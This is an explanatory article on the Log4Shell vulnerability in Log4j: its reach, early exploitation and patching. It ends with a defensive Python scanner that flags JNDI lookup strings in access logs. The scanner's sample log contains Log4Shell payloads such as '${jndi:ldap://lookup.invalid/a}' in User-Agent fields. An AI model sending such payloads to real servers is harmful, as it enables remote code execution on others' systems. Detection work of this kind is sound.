The vulnerability affects a component of the library meant to allow for the insertion of arbitrary system and Java environment variables within software logs. An attacker exploiting the vulnerability could potentially execute arbitrary, malicious code on an affected system. However, it has been noted by some that the possibility of remote code execution on live systems is circumstantially limited, and that it varies from one environment to another.

The vulnerability presents a large attack surface, particularly due to the ubiquitous use of the Log4j library in Java software. An advisory issued by the Apache Foundation mentions at least a dozen other software projects backed by the organisation as being affected as a result of Log4Shell.

At the same time, it is not just open source software that is affected. Many proprietary applications developed and used by large companies rely on the Log4j library for logging purposes and are similarly vulnerable.

Has the vulnerability been exploited yet?

Cloudflare, a company that manages a sizeable portion of Internet traffic, mentioned in a blog post analysing the Log4j vulnerability that attackers started attempting to exploit the vulnerability a mere nine minutes after it had been publicly disclosed. At the same time, the blog post also notes that a small set of exploitation attempts, or "test runs," were made more than a week prior to the vulnerability being publicly disclosed. While this could be an instance of a phenomenon known in security research as "parallel vulnerability discovery," where a particular undisclosed vulnerability may be discovered by multiple parties at the same time, it could also suggest that knowledge about the vulnerability was shared with others by an individual or group who happened to discover it.

The Apache Foundation released patches for various software projects using vulnerable versions of the Log4j library. At the same time, companies that offer web application firewalls were quick to block various Log4Shell exploitation payloads. Companies that use the library in enterprise software also made updates and security patches available to their customers shortly after the vulnerability was identified. Remediation techniques shared by the larger information security community also proved helpful to mitigate risk.
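As an added example (not code from the original article or from the Log4j project), the following Python scanner looks through web-server access logs for lookup strings of the kind described above: a jndi lookup is reported as an exploitation attempt, and any other lookup arriving in request data is reported as suspicious. The log lines, IP addresses and hostnames are constructed placeholders, not indicators from the article.

```python
import re

# Log4j 2 expands "${name:...}" lookup strings that reach a log message; the
# Log4Shell path is the jndi lookup, which can load code from a remote server.
# Any lookup string arriving inside request data is therefore worth a look,
# and a jndi lookup is treated as an exploitation attempt.
LOOKUP_RE = re.compile(r"\$\{\s*([a-z0-9_-]+)\s*:", re.IGNORECASE)

def classify(line: str) -> str:
    """Return 'exploit_attempt', 'suspicious_lookup' or 'benign' for one log line."""
    names = {m.group(1).lower() for m in LOOKUP_RE.finditer(line)}
    if "jndi" in names:
        return "exploit_attempt"
    if names:  # e.g. ${java:version}, ${env:...}, or the outer part of a nested lookup
        return "suspicious_lookup"
    return "benign"

def scan_log(text: str):
    """Classify every line of an access log.

    Returns (counts, flagged): counts per verdict, and for each non-benign line a
    tuple of (verdict, source IP, sorted lookup names found on that line)."""
    counts = {"exploit_attempt": 0, "suspicious_lookup": 0, "benign": 0}
    flagged = []
    for line in text.splitlines():
        if not line.strip():
            continue
        verdict = classify(line)
        counts[verdict] += 1
        if verdict != "benign":
            ip = line.split(" ", 1)[0]  # first field of the combined log format
            names = sorted({m.group(1).lower() for m in LOOKUP_RE.finditer(line)})
            flagged.append((verdict, ip, names))
    return counts, flagged

# Constructed sample lines in combined access-log format (placeholder hosts/IPs).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:22:41:03 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Dec/2021:22:41:09 +0000] "GET / HTTP/1.1" 200 1024 "-" "${jndi:ldap://lookup.invalid/a}"
10.0.0.7 - - [10/Dec/2021:22:43:00 +0000] "GET /health HTTP/1.1" 200 2 "-" "curl/7.79.1"
10.0.0.8 - - [10/Dec/2021:22:43:30 +0000] "GET /?q=${java:version} HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Dec/2021:22:44:02 +0000] "GET / HTTP/1.1" 200 1024 "-" "${JNDI:rmi://lookup.invalid/b}"
"""

if __name__ == "__main__":
    counts, flagged = scan_log(SAMPLE_LOG)
    print(counts)
    for verdict, ip, names in flagged:
        print(f"{verdict:18} {ip:10} lookups={names}")
```

The scanner only matches the plain lookup form; a string whose lookup name is itself built from nested lookups is reported as suspicious rather than resolved, so such lines still surface for review.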